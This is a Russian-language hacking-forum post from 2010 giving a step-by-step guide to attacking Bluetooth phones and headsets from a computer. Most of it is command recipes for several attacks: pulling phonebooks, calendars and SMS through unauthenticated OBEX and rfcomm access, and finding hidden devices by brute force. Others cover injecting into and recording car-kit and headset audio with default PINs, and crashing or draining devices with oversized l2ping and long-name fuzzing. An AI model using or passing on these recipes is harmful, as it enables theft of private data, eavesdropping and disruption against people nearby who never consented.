Показать сообщение отдельно
Старый 20.10.2010, 15:59   #3
aka_zver
 
Аватар для aka_zver
 
Регистрация: 06.07.2010
Сообщений: 63
Репутация: 37
По умолчанию

Атака с компьютера
Часть первая: win - в продолжение о спаме...
Что и говорить, здесь всё мало чем отличается от подобного же на телефоне. Запускаем BT Promo, открываем настройки, выставляем нужное нам..



...и спамим)



Результат:



Часть вторая: win - прослушка эфира
Для того, чтобы отснифать процесс передачи данных нужна хитрая программка, под названием FTS4BT; она способна превращать донгл в сниффер. Трафф декодируется на лету, разделяясь на разные типы данных, да и вообще софтина удобна, единственный жирный минус - цена. После запуска программки всё становится интуитивно понятно.

Часть третья: nix - атака на стек
Может не действовать с новыми прошивками. Взаимодействие с OBEX напрямую, в обход аутентификации:
1\ Пример слива телефонной книги.
Цитата:
// сканим эфир
hcitool scan
// в результате получаем адрес, типа
00:0E:07:99:99:99 lols_device
// просматриваем открытые сервисы
sdptool browse 00:0E:07:99:99:99
// в итоге видим сервисы с нужными нам данными


Цитата:
// подключаемся к OOP, открытому на 10-м канале и скачиваем
// телефонную книгу, находящуюся по адресу telecom/pb.vcf
obexftp -b 00:0E:07:99:99:99 --channel 10 -g telecom/pb.vcf -v
// вот и всё
Некоторые занимательные файлы OBEX:
Цитата:
telecom/devinfo.txt — серийный номер, версия прошивки и поддерживаемые настройки.
Возможно только чтение.
telecom/rtc.txt — текущее время и дата, можно изменять.
telecom/pb.vcf — телефонная книга, только чтение.
telecom/pb/luid/.vcf – создание новой телефонной записи, write only.
telecom/pb/0.vcf — личная телефонная запись, rw-режим.
telecom/pb/info.log — кодировки, длины полей (телефона и имени), общее количество, а также
занятых и свободных записей.
telecom/pb/luid/###.log — логфайл изменений телефонной книги. Ведется не во всех телефонах,
вместо ### необходимо подставить дату, изменения за которую интересуют.
telecom/pb/luid/cc.log — счетчик изменений телефонной книги, показывает количество
произведенных операций: создания, изменения и удаления записей.
telecom/cal.vcs — все календарные записи.
telecom/cal/luid/.vcs – создает новую календарную запись.
telecom/cal/info.log — кодировки, длины полей (телефона и имени), общее количество, а также
занятых и свободных записей.
telecom/cal/luid/###.log — лог-файл изменений календаря, пишется не во всех телефонах.
Вместо ### нужно подставить дату, изменения за которую интересуют.
telecom/cal/luid/cc.log — счетчик изменений календаря, показывает количество произведенных
операций: создания, изменения и удаления записей.
Цитата:
// сканим..
hcitool scan
// адрес
00:0E:07:99:99:99 lols_device
// закрепление девайса за rfcomm0
rfcomm bind /dev/rfcomm0 00:0E:07:99:99:99
// при помощи Gnokii (см. софт) или напрямую управляем телефоном
cu -l rfcomm0 -s 9600
// а дальше делаем всё, на что способна фантазия, например
// читаем смс, звоним, узнаём инфу и тд.
Или немного иначе, через Serial Port:

Цитата:
// сканим
hcitool scan
// адрес
00:0E:07:99:99:99 lols_device
// продолжаем
rfcomm_sppd -a 00:0E:07:99:99:99 -t /dev/ttyp4
// далее всё так же
cu -l ttyp4 -s 9600
// ...
или

Цитата:
// ...
// используя obexapp, синтаксис:
// obexapp –a [адрес] –C [номер_канала_с_обексом]
obexapp –a 00:0E:07:99:99:99 –C 10
// сливаем календарь через OBEX-консоль
// get [имя_скачиваемого_файла] [имя_локального_файла]
get telecom/cal.vcs cal_new.txt
// команда put присутствует
Также, могут использоваться команды:
Цитата:
Информация о найденных устройствах:
hccontrol -n [имя_узла] [команда]
(e.g. hccontrol -n ubt0hci Inquiry)
или
hcitool info [адрес]
(e.g. hcitool info 00:0E:07:99:99:99)
имя девайса:
hccontrol -n [имя_интерфейса] remote_name_request [адрес]
(e.g. hccontrol -n ubt0hci remote_name_request 00:0E:07:99:99:99)

Определение сервисов:
spdcontrol -a [MAC-адрес_кстройства] browse
(e.g. spdcontrol -a 00:0E:07:99:99:99 browse)

Поиск конкретного сервиса:
sdpcontrol -a [адрес] search [имя_сервиса]
(e.g. sdpcontrol -a 00:0E:07:99:99:99 search OPUSH)

Просмотр списка активных соединений:
hccontrol -n [имя_интерфейса] read_connection_list
(e.g. hccontrol -n ubt0hci read_connection_list)
или
l2control -a [адрес] read_connection_list
(e.g. l2control -a 00:0E:07:99:99:99 read_connection_list)

Список каналов:
l2control -a [адрес] read_channel_list
(e.g. l2control -a 00:0E:07:99:99:99 read_channel_list)
Часть четвёртая: nix - отлов скрытых устройств
Если девайс находится в режиме non-discoverable и не отвечает на широковещательные запросы, то это ещё не значит, что его нельзя обнаружить. Есть 2 варианта: активный и пассивный.
1\ Можно просто переибрать брутом последние 6 байт MAC-адреса при помощи RedFang, находя прячущихся.
(как-то так: ./redfang -n 4 -r [начальный_адрес]-[конечный_адрес] -t [таймаут])
2\ Остаёмся в режиме ожидания, изменяем имя устройства на более привлекательное.

Цитата:
// меняем имя
hciconfig hci0 name SEXY_GIRL
// перезапускаем hci0
hciconfig hci0 down
hciconfig hci0 up
// дампим адреса входящих соединений
hcidump -V | grep bdaddr
В результате имеем список адресов входящих соединений, среди которых могут быть и скрытые.

Часть пятая: nix - атака на гарнитуры
Группа Trifinite разработала софтину Car Whisperer, позволяющую добавлять\получать информацию из процесса передачи данных от каркита\хедсета к мобильному от тех, кто не сменил стандартный пароль на гарнитуре, как то:
0000, Nokia [00:02:EE..] - 5475, Audi UHV [00:0E:9F..] - 1234 (также: Cellink [00:0A:94..], Eazix [00:0C:84..]), O'Neil [00:80:37..] - 8761
Синтаксис следующий: ./carwhisperer [внедряемое] [захватываемое] [адрес_девайса] [канал]

Цитата:
// меняем класс устройства на, допустим, phone
// (0x500204), чтобы избежать непредвиденных проблем
hciconfig [адаптер] class 0x500204
// внедряем файл из папки утилиты - message.raw, выход в out.raw
./carwhisperer 0 message.raw /tmp/out.raw 00:0E:07:88:88:88
// конвертим полученное, допустим так
raw -r 8000 -c 1 -s -w out.raw -t wav -r 44100 -c 2 out.wav
Также можно сканить и другие устройства на предмет Head Set сервиса, пытаясь подключиться, используя стандартный пасс.

Часть шестая: nix - DDOS
Во время этой атаки устройство жертвы либо виснет, либо перезагружается, либо происходит быстрая разрядка батареи.
Способы реализации:
1\ Пинг устройства l2ping'ом пакетами большого размера (параметр -s).
Цитата:
l2ping -s 10000 -b 00:0E:07:99:99:99
2\ Fuzzing-метод. Основывается на том, что некоторые устройства (master) при обнаружении имени девайса, состоящего из большого числа символов, подвисают или же происходит переполнение.
Цитата:
// для линукса
hciconfig hci0 name `perl -e 'print "abc" x 3137'`
// FreeBSD
hccontrol -n [адаптер] change_local_name "[новое_имя]"
Часть седьмая: nix - прослушка эфира
В никсах это тёмное дело осуществляется при помощи hcidump; для примера посмотрим данные, проходящие через интерфейс hci0 во время выполнения hcitool info:

Цитата:
hcidump -i hci0 -X


================
Как бы приложеие
================

Мощности стандартных донглов может не хватать. Да, конечно, его можно перепаять, установив WLAN антеннку на 2,4 ГГц, но, что такое дистанция в сто метров ? Специально для увеличения радиуса действия были придуманы bluetooth-ружья, они же узконаправленные антенны типов randome или parabolic, бьющие на несколько километров. Такими штучками торговали компании HyperLink Technology, MAXRAD, Broadcast Warehouse, Радиал и др.
Сводная таблица (КУ - коэффициент усиления):

Код:
+-----------------------------------------------------------------+
| Модель  |       Тип        | КУ (dB) | Габариты (см) | Цена ($) |
-------------------------------------------------------------------
| HG2415Y | Randome-Enclosed |   14    |     462x76    |  ? > 50  |
-------------------------------------------------------------------
| HG2424G |       Parabolic        |   24    |     100x60    |  ? > 50  |
-------------------------------------------------------------------
| HG2430D |       Parabolic        |   30    |     150x?     |   ~300   |
+-----------------------------------------------------------------+
======
Ссылки
======

InfoSecurity Europe 2006
Проблемы безопасности Bluetooth
Bluetooth безопасность
Bluetooth - Википедия
https://forum.antichat.ru/thread31634.html
https://forum.antichat.ru/thread114916.html
https://forum.antichat.ru/thread17093.html
https://forum.antichat.ru/thread17089.html
http://radiative.org/rfiles/information1.zip
http://radiative.org/rfiles/video.zip
http://radiative.org/rfiles/soft.zip

###################################
Special for my friends
Copyright to aka_zver, The Wild Team, 2010
Thanks to X-RayBlade
###################################
aka_zver вне форума   Ответить с цитированием